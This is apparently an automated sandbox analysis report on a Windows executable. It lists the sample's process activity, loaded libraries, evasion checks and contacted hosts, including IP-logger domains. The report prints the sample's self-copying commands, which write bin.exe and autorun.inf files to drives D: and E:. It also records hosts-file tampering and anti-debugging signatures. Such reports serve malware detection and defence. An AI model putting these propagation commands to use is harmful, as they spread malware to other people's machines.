DISresU/,,,,,,(Fvo*V&<`?*V'@g?+W&8U/+W(Fv?*V0.0.1v xEresufnoCredoc
Source: unknown Process created: C:\Users\user\Desktop\IPrstVM17M.exe "C:\Users\user\Desktop\IPrstVM17M.exe"
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe"
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exe
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exe
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exe Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exe Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: IPrstVM17M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: IPrstVM17M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: IPrstVM17M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: IPrstVM17M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: IPrstVM17M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: IPrstVM17M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: IPrstVM17M.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: IPrstVM17M.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb source: IPrstVM17M.exe, bin.exe.3.dr
Source: Binary string: C:\Users\J\source\repos\FastSwipe\Release\FastSwipe.pdb'' source: IPrstVM17M.exe, bin.exe.3.dr
Source: IPrstVM17M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: IPrstVM17M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: IPrstVM17M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: IPrstVM17M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: IPrstVM17M.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Drops PE files
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Users\user\AppData\Local\Temp\bin.exe Jump to dropped file
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Users\user\Desktop\IPrstVM17M.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Users\user\Desktop\IPrstVM17M.exe Window / User API: threadDelayed 365 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\SysWOW64\cmd.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\bin.exe Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\IPrstVM17M.exe TID: 5820 Thread sleep time: -365000s >= -30000s Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe TID: 5820 Thread sleep time: -347000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Users\user\Desktop\IPrstVM17M.exe Last function: Thread delayed
Source: IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009C9000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(C
Source: IPrstVM17M.exe, 00000000.00000003.2038598914.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, IPrstVM17M.exe, 00000000.00000002.4424004145.00000000009F2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process information queried: ProcessInformation Jump to behavior
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: 0_2_002029B0 ?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,IsDebuggerPresent,GetModuleFileNameA,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,GetEnvironmentVariableA,GetEnvironmentVariableA,getenv,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,memcpy,memcpy,memcpy,GetEnvironmentVariableA,memcpy,_invalid_parameter_noinfo_noreturn,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@P6AAAV01@AAV01@@Z@Z,GetEnvironmentVariableA,?cerr@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,system,system,system,system,system,system,system,system,?cout@std@@3V?$basic_ostream@DU?$char_traits@D@std@@@1@A,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,_invalid_parameter_noinfo_noreturn,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,Sleep,S 0_2_002029B0
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: 0_2_0020A128 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_0020A128
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: 0_2_00209D74 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00209D74
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: 0_2_0020A28D SetUnhandledExceptionFilter, 0_2_0020A28D

HIPS / PFW / Operating System Protection Evasion
barindex
Modifies the hosts file
Source: C:\Users\user\Desktop\IPrstVM17M.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" "C:\Users\user\AppData\Local\Temp\bin.exe" Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" D:\bin.exe Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > D:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> D:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c copy /v /y "C:\Users\user\Desktop\IPrstVM17M.exe" E:\bin.exe Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo [autorun] > E:\autorun.inf Jump to behavior
Source: C:\Users\user\Desktop\IPrstVM17M.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c echo open=bin.exe >> E:\autorun.inf Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: 0_2_00209F44 cpuid 0_2_00209F44
Source: C:\Users\user\Desktop\IPrstVM17M.exe Code function: 0_2_0020A2FC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 0_2_0020A2FC

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Modifies the hosts file
Source: C:\Users\user\Desktop\IPrstVM17M.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
AV process strings found (often used to terminate AV products)
Source: IPrstVM17M.exe, IPrstVM17M.exe, 00000000.00000002.4424004145.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430905 Sample: IPrstVM17M Startdate: 24/04/2024 Architecture: WINDOWS Score: 64 25 www.google.com 2->25 27 stopify.co 2->27 29 3 other IPs or domains 2->29 37 Multi AV Scanner detection for submitted file 2->37 39 Machine Learning detection for sample 2->39 41 Machine Learning detection for dropped file 2->41 7 IPrstVM17M.exe 13 2->7         started        signatures3 process4 dnsIp5 31 stopify.co 52.173.151.229, 443, 49705 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 7->31 33 www.google.com 142.250.141.104, 49709, 80 GOOGLEUS United States 7->33 35 3 other IPs or domains 7->35 21 C:\Windows\System32\drivers\etc\hosts, ASCII 7->21 dropped 43 Modifies the hosts file 7->43 45 Queries Google from non browser process on port 80 7->45 12 cmd.exe 3 7->12         started        15 conhost.exe 7->15         started        17 cmd.exe 1 7->17         started        19 5 other processes 7->19 file6 signatures7 process8 file9 23 C:\Users\user\AppData\Local\Temp\bin.exe, PE32 12->23 dropped
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
104.26.8.202
 grabify.link United States
13335 CLOUDFLARENETUS false
172.67.161.186
 grabify.world United States
13335 CLOUDFLARENETUS false
52.173.151.229
 stopify.co United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
142.250.141.104
 www.google.com United States
15169 GOOGLEUS false
142.251.2.101
 google.com United States
15169 GOOGLEUS false

Contacted Domains

Name IP Active
google.com 142.251.2.101 true
grabify.world 172.67.161.186 true
www.google.com 142.250.141.104 true
grabify.link 104.26.8.202 true
stopify.co 52.173.151.229 true

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://google.com/ false
    		high
    https://grabify.world/news.php?tid=JBB69H.jpg false
    • 1%, Virustotal, Browse
    • Avira URL Cloud: safe
    		 unknown
    https://stopify.co/news.php?tid=JBB69H.jpg false
    • 2%, Virustotal, Browse
    • Avira URL Cloud: safe
    		 unknown
    https://grabify.link/news.php?tid=JBB69H.jpg false
      		high
      http://www.google.com/sorry/index?continue=http://google.com/&q=EgSaEGkkGMWRo7EGIjBKruM9TP71tcZqrz-afg1iOmL2n35A4yTbBqzqNKMrw11J0yadIqqCBxJ8xaVvZTgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM false
        		high